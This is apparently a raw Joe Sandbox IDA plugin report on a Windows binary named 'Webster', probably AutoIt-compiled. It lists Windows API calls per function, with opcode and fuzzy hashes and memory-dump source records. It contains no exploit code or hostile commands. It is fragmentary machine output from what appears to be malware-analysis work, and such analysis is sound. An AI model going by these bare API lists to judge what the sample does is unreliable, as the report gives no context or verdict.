                                                                                  • GetCursorPos.USER32(?), ref: 00AF7825
                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00AF7883
                                                                                  Similarity
                                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                  APIs
                                                                                    • Part of subcall function 00AD8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AD8CDE
                                                                                    • Part of subcall function 00AD8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AD8CE8
                                                                                    • Part of subcall function 00AD8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AD8CF7
                                                                                    • Part of subcall function 00AD8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AD8CFE
                                                                                    • Part of subcall function 00AD8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AD8D14
                                                                                  • GetLengthSid.ADVAPI32(?,00000000,00AD904D), ref: 00AD9482
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AD948E
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00AD9495
                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00AD94AE
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00AD904D), ref: 00AD94C2
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00AD94C9
                                                                                  Similarity
                                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AD9200
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00AD9207
                                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AD9216
                                                                                  • CloseHandle.KERNEL32(00000004), ref: 00AD9221
                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AD9250
                                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00AD9264
                                                                                  Similarity
                                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 00ADC34E
                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00ADC35F
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ADC366
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00ADC36E
                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00ADC385
                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 00ADC397
                                                                                  Similarity
                                                                                  • API ID: CapsDevice$Release
                                                                                  APIs
                                                                                    • Part of subcall function 00A816CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A81729
                                                                                    • Part of subcall function 00A816CF: SelectObject.GDI32(?,00000000), ref: 00A81738
                                                                                    • Part of subcall function 00A816CF: BeginPath.GDI32(?), ref: 00A8174F
                                                                                    • Part of subcall function 00A816CF: SelectObject.GDI32(?,00000000), ref: 00A81778
                                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B0C57C
                                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 00B0C590
                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B0C59E
                                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 00B0C5AE
                                                                                  • EndPath.GDI32(00000000), ref: 00B0C5BE
                                                                                  • StrokePath.GDI32(00000000), ref: 00B0C5CE
                                                                                  Similarity
                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                  • String ID:
                                                                                  • API String ID: 43455801-0
                                                                                  • Opcode ID: 2ffa1fa826f967513b505a88e599367b2d5789b906d183f8eaf820bdb161668a
                                                                                  • Instruction ID: 13ea90aab4ffb870198f6bc1b95ba08c267436fa95d76af938e993643b9bc76f
                                                                                  • Opcode Fuzzy Hash: 2ffa1fa826f967513b505a88e599367b2d5789b906d183f8eaf820bdb161668a
                                                                                  • Instruction Fuzzy Hash: 35111E7600010CBFDF12AF95DC89FDA7FADEB08354F048051B91856160DB71AE95DBA0
                                                                                  APIs
                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA07EC
                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA07F4
                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA07FF
                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA080A
                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA0812
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA081A
                                                                                  Similarity
                                                                                  • API ID: Virtual
                                                                                  • String ID:
                                                                                  • API String ID: 4278518827-0
                                                                                  • Opcode ID: 3fabd94c9a239b85ad7656517368801a70e7c6f1da7b7b7f800cbffbcee196c6
                                                                                  • Instruction ID: e6b9146ef21e5d0cda0961027d71b4eac33549ddb6ca866d022f73448664e2c0
                                                                                  • Opcode Fuzzy Hash: 3fabd94c9a239b85ad7656517368801a70e7c6f1da7b7b7f800cbffbcee196c6
                                                                                  • Instruction Fuzzy Hash: C6016CB09017597DE3009F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CBE5
                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AE59B4
                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AE59CA
                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00AE59D9
                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AE59E8
                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AE59F2
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AE59F9
                                                                                  Similarity
                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                  • String ID:
                                                                                  • API String ID: 839392675-0
                                                                                  • Opcode ID: b0936afb1bbc2a4861dfa55ac7b288e3caeffdf081ae721ced0a42505159cacd
                                                                                  • Instruction ID: 5f0c63ecda93286621af64d11a3a2350b7323c743a4103bc2b9a7632752b6fa4
                                                                                  • Opcode Fuzzy Hash: b0936afb1bbc2a4861dfa55ac7b288e3caeffdf081ae721ced0a42505159cacd
                                                                                  • Instruction Fuzzy Hash: AFF09032250158BFE3216B92AC0DEEF7B3CEFCBB11F404159FA00A2050DFE01A5186B5
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00AE77FE
                                                                                  • EnterCriticalSection.KERNEL32(?,?,00A8C2B6,?,?), ref: 00AE780F
                                                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00A8C2B6,?,?), ref: 00AE781C
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00A8C2B6,?,?), ref: 00AE7829
                                                                                    • Part of subcall function 00AE71F0: CloseHandle.KERNEL32(00000000,?,00AE7836,?,00A8C2B6,?,?), ref: 00AE71FA
                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AE783C
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00A8C2B6,?,?), ref: 00AE7843
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 3495660284-0
                                                                                  • Opcode ID: 0af02055c0d74b44153125cbe59f5655ef408dc9fdf1369dba1c3e1f538a5c79
                                                                                  • Instruction ID: de08b84e8b315df8c232ee00878d109e2e9d45595fd7876bf220b09a77ef3fea
                                                                                  • Opcode Fuzzy Hash: 0af02055c0d74b44153125cbe59f5655ef408dc9fdf1369dba1c3e1f538a5c79
                                                                                  • Instruction Fuzzy Hash: 4EF08232555212ABD7113B64EC8CAEF7739FF49302F944525F503A60A0DFF95891CBA0
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AD9555
                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 00AD9561
                                                                                  • CloseHandle.KERNEL32(?), ref: 00AD956A
                                                                                  • CloseHandle.KERNEL32(?), ref: 00AD9572
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00AD957B
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00AD9582
                                                                                  Similarity
                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                  • String ID:
                                                                                  • API String ID: 146765662-0
                                                                                  • Opcode ID: 6f55343c1dabc5faae9105687e4e76edf67c182d59f3c0519c3de26f9f83d3c7
                                                                                  • Instruction ID: 2d4c226933ea4cc0c2c9c4ee00ff66c4d6d1c7faedebc20d1ce05ee146b53cc2
                                                                                  • Opcode Fuzzy Hash: 6f55343c1dabc5faae9105687e4e76edf67c182d59f3c0519c3de26f9f83d3c7
                                                                                  • Instruction Fuzzy Hash: C0E0E536114105BBDB012FE1EC0C99ABF39FF4A722B908220F225920B0CFB6A4B0DB50
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 00AF8CFD
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00AF8E0C
                                                                                  • VariantClear.OLEAUT32(?), ref: 00AF8F84
                                                                                    • Part of subcall function 00AE7B1D: VariantInit.OLEAUT32(00000000), ref: 00AE7B5D
                                                                                    • Part of subcall function 00AE7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00AE7B66
                                                                                    • Part of subcall function 00AE7B1D: VariantClear.OLEAUT32(00000000), ref: 00AE7B72
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                  • API String ID: 4237274167-1221869570
                                                                                  • Opcode ID: 0e727e996a479ddfd44bc41a7c0600c04186275093c842fe335786021c78c56e
                                                                                  • Instruction ID: da885326d52322ccac5fe03a72c3a093ff5b3c82f83baf7505903b8ce4f8b55e
                                                                                  • Opcode Fuzzy Hash: 0e727e996a479ddfd44bc41a7c0600c04186275093c842fe335786021c78c56e
                                                                                  • Instruction Fuzzy Hash: 6A91AD706083059FCB00EF64C58096ABBF5EF89754F14896EF98A8B3A1DB30ED45CB52
                                                                                  APIs
                                                                                    • Part of subcall function 00A9436A: _wcscpy.LIBCMT ref: 00A9438D
                                                                                  • _memset.LIBCMT ref: 00AE332E
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AE335D
                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AE3410
                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00AE343E
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                  • String ID: 0
                                                                                  • API String ID: 4152858687-4108050209
                                                                                  • Opcode ID: d05b0dd05cab0f1a51a41b08545944c2bf477012cf68412923697393a18fc0a0
                                                                                  • Instruction ID: 8af6c38b236d61ccbd0df0b5461c3128fc89eb17d7b00b328a4fc7da7a22a8ad
                                                                                  • Opcode Fuzzy Hash: d05b0dd05cab0f1a51a41b08545944c2bf477012cf68412923697393a18fc0a0
                                                                                  • Instruction Fuzzy Hash: 42510332208381ABCF12AF2AC949A6BB7E8EF55320F04492DF895D71D1DB70CE44CB52
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AE2F67
                                                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00AE2F83
                                                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00AE2FC9
                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B47890,00000000), ref: 00AE3012
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 1173514356-4108050209
                                                                                  • Opcode ID: c471b026fcf219d63153ddc4daed3df220df9c614773dc0160ebd31e503bd9b3
                                                                                  • Instruction ID: feb8ead44e348ddfb6797f08f918d8f526f96e1227b8109e2359a5d2d0cbc1ba
                                                                                  • Opcode Fuzzy Hash: c471b026fcf219d63153ddc4daed3df220df9c614773dc0160ebd31e503bd9b3
                                                                                  • Instruction Fuzzy Hash: 5841C6322043819FDB20DF26C889B5ABBE9FF85310F144A5DF5A6972D1DB70EA05CB52
                                                                                  APIs
                                                                                  • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00AFDEAE
                                                                                    • Part of subcall function 00A91462: _memmove.LIBCMT ref: 00A914B0
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: BuffCharLower_memmove
                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                  • API String ID: 3425801089-567219261
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AD9ACC
                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AD9ADF
                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00AD9B0F
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: MessageSend$_memmove$ClassName
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 365058703-1403004172
                                                                                  APIs
                                                                                    • Part of subcall function 00A82111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A8214F
                                                                                    • Part of subcall function 00A82111: GetStockObject.GDI32(00000011), ref: 00A82163
                                                                                    • Part of subcall function 00A82111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8216D
                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B06A86
                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00B06A8D
                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B06AA2
                                                                                  • DestroyWindow.USER32(?), ref: 00B06AAA
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                  • String ID: SysAnimate32
                                                                                  • API String ID: 4146253029-1011021900
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00AE7377
                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AE73AA
                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00AE73BC
                                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00AE73F6
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: CreateHandle$FilePipe
                                                                                  • String ID: nul
                                                                                  • API String ID: 4209266947-2873401336
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00AE7444
                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AE7476
                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00AE7487
                                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00AE74C1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: CreateHandle$FilePipe
                                                                                  • String ID: nul
                                                                                  • API String ID: 4209266947-2873401336
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00AEB297
                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00AEB2EB
                                                                                  • __swprintf.LIBCMT ref: 00AEB304
                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B10980), ref: 00AEB342
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                  • String ID: %lu
                                                                                  • API String ID: 3164766367-685833217
                                                                                  APIs
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                    • Part of subcall function 00ADAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ADAA6F
                                                                                    • Part of subcall function 00ADAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADAA82
                                                                                    • Part of subcall function 00ADAA52: GetCurrentThreadId.KERNEL32 ref: 00ADAA89
                                                                                    • Part of subcall function 00ADAA52: AttachThreadInput.USER32(00000000), ref: 00ADAA90
                                                                                  • GetFocus.USER32 ref: 00ADAC2A
                                                                                    • Part of subcall function 00ADAA9B: GetParent.USER32(?), ref: 00ADAAA9
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00ADAC73
                                                                                  • EnumChildWindows.USER32(?,00ADACEB), ref: 00ADAC9B
                                                                                  • __swprintf.LIBCMT ref: 00ADACB5
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                  • String ID: %s%d
                                                                                  • API String ID: 1941087503-1110647743
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00AE2318
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper
                                                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                  • API String ID: 3964851224-769500911
                                                                                  APIs
                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AFF2F0
                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00AFF320
                                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00AFF453
                                                                                  • CloseHandle.KERNEL32(?), ref: 00AFF4D4
                                                                                  Similarity
                                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                  • String ID:
                                                                                  • API String ID: 2364364464-0
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00B0147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0075D
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B0079C
                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B007E3
                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00B0080F
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B0081C
                                                                                  Similarity
                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 3440857362-0
                                                                                  • Opcode ID: a718e0c02b4d4cc455a7c94385c6dbee1e2ecf20362dbef2686a7ff7155d81b9
                                                                                  • Instruction ID: 23fd003b36390aed1366f480d901e21cb5e67fc74f68f9ba42044d8d3b6b5fb1
                                                                                  • Opcode Fuzzy Hash: a718e0c02b4d4cc455a7c94385c6dbee1e2ecf20362dbef2686a7ff7155d81b9
                                                                                  • Instruction Fuzzy Hash: F7516A71218205AFC704EF64C981FAABBE9FF88304F40895DF596872A1EB30ED04CB52
                                                                                  APIs
                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00AEEC62
                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00AEEC8B
                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00AEECCA
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00AEECEF
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00AEECF7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1389676194-0
                                                                                  • Opcode ID: f5e2f957c43055dd4d41a4b823c58acb9999de86643f614418c4559ff3b77d31
                                                                                  • Instruction ID: c7409af63e3bbe9d49ce873eea889a85985b085d50e0c1b81f6f58d0937a00af
                                                                                  • Opcode Fuzzy Hash: f5e2f957c43055dd4d41a4b823c58acb9999de86643f614418c4559ff3b77d31
                                                                                  • Instruction Fuzzy Hash: 45512A35A00119DFCB01EF65CA85EAEBBF5EF0D314B148099E809AB3A1DB31ED51DB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d139672f6ed9359fb1c9d41f4c10e2810698019814564e562e0c785fadb86ddc
                                                                                  • Instruction ID: c9f8ed7ade3041d236902078cc357ce16913d4d56c387c8605e2b8769ee2d179
                                                                                  • Opcode Fuzzy Hash: d139672f6ed9359fb1c9d41f4c10e2810698019814564e562e0c785fadb86ddc
                                                                                  • Instruction Fuzzy Hash: F641D035904214AFD720DB28CC88FA9BFF8EB09310F5489A5F916A72D1CB70AD41DA91
                                                                                  APIs
                                                                                  • GetCursorPos.USER32(?), ref: 00A82727
                                                                                  • ScreenToClient.USER32(00B477B0,?), ref: 00A82744
                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00A82769
                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 00A82777
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                  • String ID:
                                                                                  • API String ID: 4210589936-0
                                                                                  • Opcode ID: 91765a0ba9bf56245010c50d45fc1f572c7b0f0526bb3339782c118c0d484be2
                                                                                  • Instruction ID: c3b8855ecbb31b9226bc472da62046e87461ec0baf1d074ec6598700f89f1d89
                                                                                  • Opcode Fuzzy Hash: 91765a0ba9bf56245010c50d45fc1f572c7b0f0526bb3339782c118c0d484be2
                                                                                  • Instruction Fuzzy Hash: EE416C75504119FFDF15AF69C844EE9BBB8BB05334F50835AF82896291CB30ADA0DB91
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(?,?), ref: 00AD95E8
                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00AD9692
                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00AD969A
                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00AD96A8
                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00AD96B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3382505437-0
                                                                                  • Opcode ID: 2d90125b901a0c8a518610768ebe036e075a11daa472d98feaac167b8ba57d07
                                                                                  • Instruction ID: 45a5067ec412803f47c72d88cc31fb3ee7a4ddc4e4985759950be425b86cd93f
                                                                                  • Opcode Fuzzy Hash: 2d90125b901a0c8a518610768ebe036e075a11daa472d98feaac167b8ba57d07
                                                                                  • Instruction Fuzzy Hash: C931CC71900219EFDB14CF68D94CADE3BB5FB44315F10822AF926AB2D0C7B0D964DB90
                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(?), ref: 00ADBD9D
                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ADBDBA
                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ADBDF2
                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ADBE18
                                                                                  • _wcsstr.LIBCMT ref: 00ADBE22
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                  • String ID:
                                                                                  • API String ID: 3902887630-0
                                                                                  • Opcode ID: beb54a4fa45e14b32201903d537f3e1a366d61897d8a3acb120177027e007897
                                                                                  • Instruction ID: 80e2bfb6f9bdfd9b73446817e5a6e1cb1e2b8a410604e1a807ab1951c0507393
                                                                                  • Opcode Fuzzy Hash: beb54a4fa45e14b32201903d537f3e1a366d61897d8a3acb120177027e007897
                                                                                  • Instruction Fuzzy Hash: 8021F932614204FFEB255B399C49EBB7BADDF45760F11802AF90ADB291EF61DC509270
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B0B804
                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B0B829
                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B0B841
                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00B0B86A
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00AF155C,00000000), ref: 00B0B888
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
